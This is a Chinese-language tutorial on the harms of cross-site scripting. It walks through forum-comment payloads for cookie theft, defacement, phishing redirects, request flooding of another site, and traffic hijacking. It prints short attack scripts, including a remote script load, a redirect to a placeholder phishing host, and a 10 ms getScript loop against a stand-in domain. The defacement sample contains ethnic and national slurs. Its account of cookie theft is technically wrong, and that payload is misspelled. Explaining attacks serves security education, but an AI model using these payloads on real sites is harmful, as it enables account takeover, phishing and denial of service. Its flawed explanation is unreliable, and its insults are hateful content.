本文详细讲解XSS主要危害及其原理。
一 说明
XSS攻击最终发生在用户的浏览器上,攻击者利用XSS漏洞可执行任意的JavaScript脚本,所以JavaScript脚本能做的操作攻击者都可以做。
主要的危害有如下:
1)窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害;
2)篡改网站页面,显示非法信息;
3)重定向页面到钓鱼网站;
4)对其他网站进行DDoS攻击;
5)劫持流量实现恶意跳转。
二 窃取Cookie,盗用sessionid等敏感信息
2.1 主要危害
窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害。
2.2 窃取cookie的方法
1)A攻击者在S论坛网站的留言板区域输入<script scr=”js_url”></script>,这里的js_url是A自己的电脑启动的一个服务器上边资源;
2)B是一个S论坛用户,S访问到浏览板块时,B的浏览器就会加载上边的脚本,向A的服务器请求js资源,注意,这个请求会携带cookie等信息;
3)A这时就能拿到B的cookie等重要信息,在通过一些其它小工具,就能不输入账号密码,通过B用户的身份进行登录S网站了,这时候就可以肆意进行操作了。
三 篡改网站页面
3.1 主要危害
显示非法信息(例如:非法广告、非法图片、非法链接、非法新闻等等)。如果网站流量很大,会造成很大危害。
3.2 篡改网站页面方式:
1)A攻击者在S论坛网站的留言板区域输入下边内容:
1 <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> 2 <script type="text/javascript"> 3 var $insert = $('<div>世界即将毁灭,人类即将毁灭!!!美国是SB!!!小日本是SB</div>'); 4 $('body').append($insert); 5 </script>
2)B是一个S论坛用户,访问到浏览板块时,B的浏览器就会加载上边的脚本,这时候,B的浏览页面中就会显示出上边那段攻击者构造的内容了。
四 重定向页面到钓鱼网站
4.1 主要危害
用户将无法正常访问原来网站,“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。
4.2 重定向到钓鱼网站的方法
1)A攻击者在S论坛的留言板区域输入下边内容:
1 <script type="text/javascript"> 2 window.location.href = "https://www.xxxxx.com"; 3 </script>
说明:上边的https://www.xxxxx.com地址,是一个和S网站登录页面几乎一样的页面,而这个页面对应的后台是A攻击者自己的服务器。
2)B是一个S论坛用户,访问到浏览板块时,B的浏览器就会加载上边的脚本,这时候,页面就重定向到了https://www.xxxxx.com。
而这个地址对应的页面又与S网站登录页一样,如果用户直接输入用户名和密码,直接提交,这时A在后台服务器就拿到了用户的用户名和密码。
五 对其它网站进行DDos攻击
5.1 主要危害
注入脚本让浏览器向其他网站发送请求,如果漏洞网站本身的访问量很大,就会导致其他网站瞬间涌入大量流量,造成拒绝服务攻击。具体案例可参考:http://www.freebuf.com/news/33385.html。
5.2 对其它网站进行DDos攻击方法
1)A攻击者在S论坛的留言板区域输入下边内容:
1 <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> 2 <script type="text/javascript"> 3 setInterval(function () { 4 $.getScript("https://xxxxxxx.com/xxxx.js"); 5 }, 10) 6 </script>
2) 如果S网站是是一个浏览量很大的网站,这时候只要有一个用户在浏览这个网站的留言板,每秒就会给https://xxxxxxx.com/发送100次请求,如果同时有10万人浏览,就会造成每秒1000万次请求,而且是一直持续不断的,很有可能导致对应网站的服务器瘫痪掉或者拒绝访问。
六 劫持流量实现恶意跳转
6.1 主要危害
导致原网站不可用,实现恶意流量导向。例如:将京东卖奶粉的页面自动重定向到淘宝卖奶粉的页面,这样导致京东卖奶粉的损失惨重。
6.2 劫持流量进行恶意跳转方法
这里不再详细写了,参考上边5.2中重定向到钓鱼网站的方法即可。